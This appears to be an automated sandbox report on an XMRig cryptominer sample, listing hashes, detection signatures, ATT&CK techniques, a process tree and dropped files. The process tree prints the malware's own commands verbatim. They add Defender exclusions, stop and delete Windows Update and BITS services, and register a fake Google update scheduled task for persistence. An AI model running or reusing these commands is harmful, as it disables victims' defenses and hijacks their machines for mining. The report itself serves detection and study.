xmrig | c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

General

Target

9e2dccb45bffdc436741e88b0125cfba.exe
Size

4.0MB
MD5

9e2dccb45bffdc436741e88b0125cfba
SHA1

07ea0a692175a9a3c946263cb77fb8a328c8ebc1
SHA256

c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3
SHA512

457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a
SSDEEP

49152:gT7yVPROZiO+S/+wpOBvfP35y8XVA1drVgfQi4V9XBVzc/4zQFFaNzzcICyxhouf:gT72P2irffhy8XV+ZiWzwiNzxOAukKr

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4412-186-0x00007FF74FC50000-0x00007FF750444000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1056 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1056	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4412-183-0x00007FF74FC50000-0x00007FF750444000-memory.dmp	upx
behavioral2/memory/4412-186-0x00007FF74FC50000-0x00007FF750444000-memory.dmp	upx

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 1056 set thread context of 3292	1056	updater.exe	conhost.exe
PID 1056 set thread context of 4412	1056	updater.exe	dwm.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5100 sc.exe
800 sc.exe
4928 sc.exe
4384 sc.exe
4516 sc.exe
4800 sc.exe
256 sc.exe
4744 sc.exe
1084 sc.exe
3912 sc.exe

pid	process
5100	sc.exe
800	sc.exe
4928	sc.exe
4384	sc.exe
4516	sc.exe
4800	sc.exe
256	sc.exe
4744	sc.exe
1084	sc.exe
3912	sc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedwm.exe

pid	process
2276	powershell.exe
2276	powershell.exe
4632	powershell.exe
4632	powershell.exe
4196	powershell.exe
4196	powershell.exe
2264	powershell.exe
2264	powershell.exe
3128	powershell.exe
3128	powershell.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe
4412	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

652

pid	process
652

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	4632	powershell.exe
Token: SeIncreaseQuotaPrivilege	4632	powershell.exe
Token: SeSecurityPrivilege	4632	powershell.exe
Token: SeTakeOwnershipPrivilege	4632	powershell.exe
Token: SeLoadDriverPrivilege	4632	powershell.exe
Token: SeSystemProfilePrivilege	4632	powershell.exe
Token: SeSystemtimePrivilege	4632	powershell.exe
Token: SeProfSingleProcessPrivilege	4632	powershell.exe
Token: SeIncBasePriorityPrivilege	4632	powershell.exe
Token: SeCreatePagefilePrivilege	4632	powershell.exe
Token: SeBackupPrivilege	4632	powershell.exe
Token: SeRestorePrivilege	4632	powershell.exe
Token: SeShutdownPrivilege	4632	powershell.exe
Token: SeDebugPrivilege	4632	powershell.exe
Token: SeSystemEnvironmentPrivilege	4632	powershell.exe
Token: SeRemoteShutdownPrivilege	4632	powershell.exe
Token: SeUndockPrivilege	4632	powershell.exe
Token: SeManageVolumePrivilege	4632	powershell.exe
Token: 33	4632	powershell.exe
Token: 34	4632	powershell.exe
Token: 35	4632	powershell.exe
Token: 36	4632	powershell.exe
Token: SeIncreaseQuotaPrivilege	4632	powershell.exe
Token: SeSecurityPrivilege	4632	powershell.exe
Token: SeTakeOwnershipPrivilege	4632	powershell.exe
Token: SeLoadDriverPrivilege	4632	powershell.exe
Token: SeSystemProfilePrivilege	4632	powershell.exe
Token: SeSystemtimePrivilege	4632	powershell.exe
Token: SeProfSingleProcessPrivilege	4632	powershell.exe
Token: SeIncBasePriorityPrivilege	4632	powershell.exe
Token: SeCreatePagefilePrivilege	4632	powershell.exe
Token: SeBackupPrivilege	4632	powershell.exe
Token: SeRestorePrivilege	4632	powershell.exe
Token: SeShutdownPrivilege	4632	powershell.exe
Token: SeDebugPrivilege	4632	powershell.exe
Token: SeSystemEnvironmentPrivilege	4632	powershell.exe
Token: SeRemoteShutdownPrivilege	4632	powershell.exe
Token: SeUndockPrivilege	4632	powershell.exe
Token: SeManageVolumePrivilege	4632	powershell.exe
Token: 33	4632	powershell.exe
Token: 34	4632	powershell.exe
Token: 35	4632	powershell.exe
Token: 36	4632	powershell.exe
Token: SeIncreaseQuotaPrivilege	4632	powershell.exe
Token: SeSecurityPrivilege	4632	powershell.exe
Token: SeTakeOwnershipPrivilege	4632	powershell.exe
Token: SeLoadDriverPrivilege	4632	powershell.exe
Token: SeSystemProfilePrivilege	4632	powershell.exe
Token: SeSystemtimePrivilege	4632	powershell.exe
Token: SeProfSingleProcessPrivilege	4632	powershell.exe
Token: SeIncBasePriorityPrivilege	4632	powershell.exe
Token: SeCreatePagefilePrivilege	4632	powershell.exe
Token: SeBackupPrivilege	4632	powershell.exe
Token: SeRestorePrivilege	4632	powershell.exe
Token: SeShutdownPrivilege	4632	powershell.exe
Token: SeDebugPrivilege	4632	powershell.exe
Token: SeSystemEnvironmentPrivilege	4632	powershell.exe
Token: SeRemoteShutdownPrivilege	4632	powershell.exe
Token: SeUndockPrivilege	4632	powershell.exe
Token: SeManageVolumePrivilege	4632	powershell.exe
Token: 33	4632	powershell.exe
Token: 34	4632	powershell.exe
Token: 35	4632	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9e2dccb45bffdc436741e88b0125cfba.execmd.exepowershell.exeupdater.execmd.execonhost.execmd.exe

description	pid	process	target process
PID 3564 wrote to memory of 2276	3564	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 3564 wrote to memory of 2276	3564	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 3564 wrote to memory of 3768	3564	9e2dccb45bffdc436741e88b0125cfba.exe	cmd.exe
PID 3564 wrote to memory of 3768	3564	9e2dccb45bffdc436741e88b0125cfba.exe	cmd.exe
PID 3564 wrote to memory of 4632	3564	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 3564 wrote to memory of 4632	3564	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 3768 wrote to memory of 256	3768	cmd.exe	sc.exe
PID 3768 wrote to memory of 256	3768	cmd.exe	sc.exe
PID 3768 wrote to memory of 5100	3768	cmd.exe	sc.exe
PID 3768 wrote to memory of 5100	3768	cmd.exe	sc.exe
PID 3768 wrote to memory of 4744	3768	cmd.exe	sc.exe
PID 3768 wrote to memory of 4744	3768	cmd.exe	sc.exe
PID 3768 wrote to memory of 1084	3768	cmd.exe	sc.exe
PID 3768 wrote to memory of 1084	3768	cmd.exe	sc.exe
PID 3768 wrote to memory of 3912	3768	cmd.exe	sc.exe
PID 3768 wrote to memory of 3912	3768	cmd.exe	sc.exe
PID 3768 wrote to memory of 4504	3768	cmd.exe	reg.exe
PID 3768 wrote to memory of 4504	3768	cmd.exe	reg.exe
PID 3768 wrote to memory of 4804	3768	cmd.exe	reg.exe
PID 3768 wrote to memory of 4804	3768	cmd.exe	reg.exe
PID 3768 wrote to memory of 608	3768	cmd.exe	reg.exe
PID 3768 wrote to memory of 608	3768	cmd.exe	reg.exe
PID 3768 wrote to memory of 4288	3768	cmd.exe	reg.exe
PID 3768 wrote to memory of 4288	3768	cmd.exe	reg.exe
PID 3768 wrote to memory of 3956	3768	cmd.exe	reg.exe
PID 3768 wrote to memory of 3956	3768	cmd.exe	reg.exe
PID 3564 wrote to memory of 4196	3564	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 3564 wrote to memory of 4196	3564	9e2dccb45bffdc436741e88b0125cfba.exe	powershell.exe
PID 4196 wrote to memory of 2828	4196	powershell.exe	schtasks.exe
PID 4196 wrote to memory of 2828	4196	powershell.exe	schtasks.exe
PID 1056 wrote to memory of 2264	1056	updater.exe	powershell.exe
PID 1056 wrote to memory of 2264	1056	updater.exe	powershell.exe
PID 1056 wrote to memory of 2744	1056	updater.exe	cmd.exe
PID 1056 wrote to memory of 2744	1056	updater.exe	cmd.exe
PID 1056 wrote to memory of 3128	1056	updater.exe	powershell.exe
PID 1056 wrote to memory of 3128	1056	updater.exe	powershell.exe
PID 2744 wrote to memory of 4384	2744	cmd.exe	sc.exe
PID 2744 wrote to memory of 4384	2744	cmd.exe	sc.exe
PID 2744 wrote to memory of 4516	2744	cmd.exe	sc.exe
PID 2744 wrote to memory of 4516	2744	cmd.exe	sc.exe
PID 2744 wrote to memory of 4800	2744	cmd.exe	sc.exe
PID 2744 wrote to memory of 4800	2744	cmd.exe	sc.exe
PID 2744 wrote to memory of 800	2744	cmd.exe	sc.exe
PID 2744 wrote to memory of 800	2744	cmd.exe	sc.exe
PID 2744 wrote to memory of 4928	2744	cmd.exe	sc.exe
PID 2744 wrote to memory of 4928	2744	cmd.exe	sc.exe
PID 2744 wrote to memory of 3640	2744	cmd.exe	reg.exe
PID 2744 wrote to memory of 3640	2744	cmd.exe	reg.exe
PID 2744 wrote to memory of 3740	2744	cmd.exe	reg.exe
PID 2744 wrote to memory of 3740	2744	cmd.exe	reg.exe
PID 2744 wrote to memory of 3196	2744	cmd.exe	reg.exe
PID 2744 wrote to memory of 3196	2744	cmd.exe	reg.exe
PID 2744 wrote to memory of 1108	2744	cmd.exe	reg.exe
PID 2744 wrote to memory of 1108	2744	cmd.exe	reg.exe
PID 2744 wrote to memory of 3808	2744	cmd.exe	reg.exe
PID 2744 wrote to memory of 3808	2744	cmd.exe	reg.exe
PID 1056 wrote to memory of 3292	1056	updater.exe	conhost.exe
PID 1056 wrote to memory of 3292	1056	updater.exe	conhost.exe
PID 1056 wrote to memory of 3292	1056	updater.exe	conhost.exe
PID 1056 wrote to memory of 2580	1056	updater.exe	cmd.exe
PID 1056 wrote to memory of 2580	1056	updater.exe	cmd.exe
PID 3292 wrote to memory of 1844	3292	conhost.exe	cmd.exe
PID 3292 wrote to memory of 1844	3292	conhost.exe	cmd.exe
PID 2580 wrote to memory of 3568	2580	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\9e2dccb45bffdc436741e88b0125cfba.exe
"C:\Users\Admin\AppData\Local\Temp\9e2dccb45bffdc436741e88b0125cfba.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3768

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:256

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:5100

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4744

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1084

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:3912

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4504

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4804

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:608

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4288

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:3956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ddxyuoslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4196

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:2828

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2264

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4384

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4516

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4800

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:800

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4928

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:3640

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:3740

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:3196

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1108

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:3808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3128

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe jmcfgycslfymn
2⤵
- Suspicious use of WriteProcessMemory
PID:3292

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
3⤵
PID:1844

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
- Suspicious use of WriteProcessMemory
PID:2580

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name
3⤵
PID:3568

C:\Windows\system32\dwm.exe
C:\Windows\system32\dwm.exe rhsgxdrgcnvokcze 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9ab2lSIri/mxz2RWaQYEWaHr+wsVwDrDaUmzhazyLU8bE+gbFvD2hyocZFBvGnOyRz2iSzhnZ7rBWrLxt5q36TsGIHyIiMTkfwiniXKP/hUp/fAVcT9dBT6tKiKkFF/MseV
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4412

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Impair Defenses

1

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3235c0b45a0ee14bd4e5213339b30705

SHA1
49ebee3177d8bf7d2b1ce8df3f28f3cc576364aa

SHA256
e407d81c185f5505e1f76e43cfe12076caf7fc7ffb35fd8df087c12c35125b9f

SHA512
2e3e467a766e7f05c81f661472bf8ce944f915cf829f70b4f988b65fc55165580fe37bb8683851e28b939313707c995849fefb1f402d57998412de96cfe0cd54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e97a37714f51572537f61c77f240370f

SHA1
d623c7c77f04dbfc8dab289b5a91a8443aae3c57

SHA256
509758ba25e57173b54dc241f9d122a9b9bc112593bf3bd2de86c692690d000e

SHA512
7e7adc8a80d2f93e41b20a9a27337b67d07386558d046d845916cf58ee63105a8219239bd32c2116338e3a1cdffc3ed6e3d3b6c7b6a4e900a207906dce6f752a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
69e731ac521fa183f42d3d2b645c8d85

SHA1
7380ce8955d536869d487308833ce7a6e7848533

SHA256
b0823e441fe48054d63f7ee81c135ee2c1ce5a7ca08ed45e9f0a3f0826d44518

SHA512
e12d34b020ac985c4f09dc7d40a63ef8e03283eb846326155cb3a376d5fd8d6e4fe28cd67e5a1e90057705ce76b581a85a25bbf89a1438e4b38cd04609c55aad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
f994815edea79688903f374b373848cc

SHA1
122c649520fa4e5f9ee602ead7748cab2448deb1

SHA256
63c62fe05e690671d433399df8565a0a99d6a9d9708fc8033b8d196b672ccda4

SHA512
b8e9e749a88a3b8f728fddcaf6353345e8e53b2a1fc8b06f182745907c53c106bf3a530846031619d9a6c2b94a7d0468d05389e84087f447e3f377154a9e12d3

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
Filesize
142B

MD5
543c22e022ad2fe07e2fff6782b5842f

SHA1
b0ce4f26371897a0f1a3460c14520adf3d665a69

SHA256
62c97f684183ebec6c67e3cd5cb96e23435d07e0ef9687196b58a2da6d5de8a3

SHA512
f33db332015bb84e8c31dd78af7511b761e8bf7946cd046b7190df1246f7ae646e5edaa1f47dae3f3137a80607697ec08b8d198438886e8a3c16f7e9dee83640

Download Submit
memory/256-138-0x0000000000000000-mapping.dmp

Download
memory/608-148-0x0000000000000000-mapping.dmp

Download
memory/800-167-0x0000000000000000-mapping.dmp

Download
memory/1084-143-0x0000000000000000-mapping.dmp

Download
memory/1108-173-0x0000000000000000-mapping.dmp

Download
memory/1844-178-0x0000000000000000-mapping.dmp

Download
memory/2264-158-0x0000000000000000-mapping.dmp

Download
memory/2264-160-0x00007FFBEB930000-0x00007FFBEC3F1000-memory.dmp

Filesize
10.8MB

Download
memory/2276-132-0x0000000000000000-mapping.dmp

Download
memory/2276-135-0x00007FFBEA9F0000-0x00007FFBEB4B1000-memory.dmp

Filesize
10.8MB

Download
memory/2276-134-0x00007FFBEA9F0000-0x00007FFBEB4B1000-memory.dmp

Filesize
10.8MB

Download
memory/2276-133-0x00000223BB8F0000-0x00000223BB912000-memory.dmp

Filesize
136KB

Download
memory/2580-177-0x0000000000000000-mapping.dmp

Download
memory/2744-161-0x0000000000000000-mapping.dmp

Download
memory/2828-155-0x0000000000000000-mapping.dmp

Download
memory/3128-162-0x0000000000000000-mapping.dmp

Download
memory/3128-169-0x00007FFBEB930000-0x00007FFBEC3F1000-memory.dmp

Filesize
10.8MB

Download
memory/3128-175-0x00007FFBEB930000-0x00007FFBEC3F1000-memory.dmp

Filesize
10.8MB

Download
memory/3196-172-0x0000000000000000-mapping.dmp

Download
memory/3292-176-0x00007FF6371014E0-mapping.dmp

Download
memory/3568-179-0x0000000000000000-mapping.dmp

Download
memory/3640-170-0x0000000000000000-mapping.dmp

Download
memory/3740-171-0x0000000000000000-mapping.dmp

Download
memory/3768-136-0x0000000000000000-mapping.dmp

Download
memory/3808-174-0x0000000000000000-mapping.dmp

Download
memory/3912-144-0x0000000000000000-mapping.dmp

Download
memory/3956-150-0x0000000000000000-mapping.dmp

Download
memory/4196-156-0x00007FFBEB930000-0x00007FFBEC3F1000-memory.dmp

Filesize
10.8MB

Download
memory/4196-152-0x0000000000000000-mapping.dmp

Download
memory/4196-154-0x00007FFBEB930000-0x00007FFBEC3F1000-memory.dmp

Filesize
10.8MB

Download
memory/4288-149-0x0000000000000000-mapping.dmp

Download
memory/4384-163-0x0000000000000000-mapping.dmp

Download
memory/4412-183-0x00007FF74FC50000-0x00007FF750444000-memory.dmp

Filesize
8.0MB

Download
memory/4412-185-0x000001F43FE50000-0x000001F43FE70000-memory.dmp

Filesize
128KB

Download
memory/4412-192-0x000001F4D2B80000-0x000001F4D2BA0000-memory.dmp

Filesize
128KB

Download
memory/4412-191-0x000001F4D2750000-0x000001F4D2770000-memory.dmp

Filesize
128KB

Download
memory/4412-190-0x000001F4D2B80000-0x000001F4D2BA0000-memory.dmp

Filesize
128KB

Download
memory/4412-189-0x000001F4D2750000-0x000001F4D2770000-memory.dmp

Filesize
128KB

Download
memory/4412-188-0x000001F4D2750000-0x000001F4D2770000-memory.dmp

Filesize
128KB

Download
memory/4412-187-0x000001F4D2750000-0x000001F4D2770000-memory.dmp

Filesize
128KB

Download
memory/4412-182-0x00007FF7504425D0-mapping.dmp

Download
memory/4412-186-0x00007FF74FC50000-0x00007FF750444000-memory.dmp

Filesize
8.0MB

Download
memory/4412-184-0x000001F43E660000-0x000001F43E680000-memory.dmp

Filesize
128KB

Download
memory/4504-145-0x0000000000000000-mapping.dmp

Download
memory/4516-164-0x0000000000000000-mapping.dmp

Download
memory/4632-151-0x00007FFBEA6A0000-0x00007FFBEB161000-memory.dmp

Filesize
10.8MB

Download
memory/4632-137-0x0000000000000000-mapping.dmp

Download
